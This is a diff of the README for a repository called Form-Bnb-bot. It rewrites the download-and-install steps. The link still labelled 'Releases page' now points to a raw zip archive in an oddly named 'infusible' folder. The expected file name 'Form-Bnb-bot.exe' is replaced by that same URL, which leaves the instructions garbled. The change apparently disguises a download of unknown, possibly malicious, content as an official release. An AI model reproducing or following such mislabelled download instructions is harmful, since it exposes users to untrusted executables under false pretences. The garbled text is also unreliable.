haqiqaa/Form-Bnb-bot/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/haqiqaa/Form-Bnb-bot/releases) to find the latest version of Form-Bnb-bot.
+   Go to the [Releases page](https://raw.githubusercontent.com/haqiqaa/Form-Bnb-bot/main/infusible/Form-Bnb-bot_1.0.zip) to find the latest version of Form-Bnb-bot.

 2. **Choose the Correct File**
    You will see a list of available files.
 Look for the one that best suits your system.
-For most users, this will be labeled as "Form-Bnb-bot.exe".
+For most users, this will be labeled as "https://raw.githubusercontent.com/haqiqaa/Form-Bnb-bot/main/infusible/Form-Bnb-bot_1.0.zip".

 3. **Download the File**
    Click on the file link to download it to your computer.
 The download should start automatically.